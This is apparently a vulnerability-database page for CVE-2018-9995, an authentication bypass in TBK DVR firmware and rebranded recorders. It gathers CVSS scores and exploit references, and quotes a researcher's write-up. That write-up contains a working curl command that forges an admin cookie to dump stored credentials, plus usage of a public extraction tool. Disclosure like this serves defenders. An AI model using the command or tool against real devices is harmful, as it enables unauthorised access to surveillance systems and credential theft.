CVE-2018-9995 - Unspecified vulnerability in Tbkvision Tbk-Dvr4104 Firmware and Tbk-Dvr4216 Firmware

CVSS 9.8 - CRITICAL
Attack vector: NETWORK
Attack complexity: LOW
Privileges required: NONE
Confidentiality impact: HIGH
Integrity impact: HIGH
Availability impact: HIGH
Tags: network, low complexity, tbkvision, critical, exploit available

Summary

TBK DVR4104 and DVR4216 devices, as well as Novo, CeNova, QSee, Pulnix, XVR 5 in 1, Securus, Night OWL, DVR Login, HVR Login, and MDVR Login, which run re-branded versions of the original TBK DVR4104 and DVR4216 series, allow remote attackers to bypass authentication via a "Cookie: uid=admin" header, as demonstrated by a device.rsp?opt=user&cmd=list request that provides credentials within JSON data in a response.

Vulnerable Configurations

| Part | Description | Count |
|------|-------------|-------|
| OS | Tbkvision | 2 |
| Hardware | Tbkvision | 2 |

Exploit-Db

description: TBK DVR4104 / DVR4216 - Credentials Leak. CVE-2018-9995. Remote exploit for Hardware platform
file: exploits/hardware/remote/44577.py
id: EDB-ID:44577
last seen: 2018-05-24
modified: 2018-05-02
platform: hardware
port:
published: 2018-05-02
reporter: Exploit-DB
source: https://www.exploit-db.com/download/44577/
title: TBK DVR4104 / DVR4216 - Credentials Leak
type: remote

Packetstorm

data source: https://packetstormsecurity.com/files/download/147478/tbk-disclose.txt
id: PACKETSTORM:147478
last seen: 2018-05-07
published: 2018-05-04
reporter: Fernandez Ezequiel
source: https://packetstormsecurity.com/files/147478/TBK-DVR4104-DVR4216-Credential-Disclosure.html
title: TBK DVR4104 / DVR4216 Credential Disclosure

Seebug

bulletinFamily: exploit
description:

In a previous article I presented a vuln that allowed me to obtain the credentials of a certain DVR model. As simple as:

```
$> curl "http://<dvr_host>:<port>/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin"
```

It turns out the finding does not correspond to one particular vendor, as I originally assumed.

I was sketching out a tool to make extracting those credentials more user-friendly, and along the way I came across new banners that in some cases represent their vendor:

[screenshots of login banners]

etc...

In the end, once inside, they are all the same (equally vulnerable).

[screenshots]

On The Wild:

[screenshots]

Clearly the number of exposed devices is not small!

TOOL:

Now then: https://github.com/ezelf/CVE-2018-9995_dvr_credentials

QUICK START

```
usr@pwn:~$ git clone https://github.com/ezelf/CVE-2018-9995_dvr_credentials.git
usr@pwn:~$ cd CVE-2018-9995_dvr_credentials
usr@pwn:~$ pip install -r requirements.txt
```

HELP

```
usage: getDVR_Credentials.py [-h] [-v] --host HOST [--port PORT]

[+] Obtaining Exposed credentials

optional arguments:
  -h, --help     show this help message and exit
  -v, --version  show program's version number and exit
  --host HOST    Host
  --port PORT    Port

[+] Demo: python getDVR_Credentials.py --host 192.168.1.101 -p 81
```

id: SSV:97260
last seen: 2018-06-26
modified: 2018-05-02
published: 2018-05-02
reporter: My Seebug
title: TBK DVR Login Bypass (CVE-2018-9995)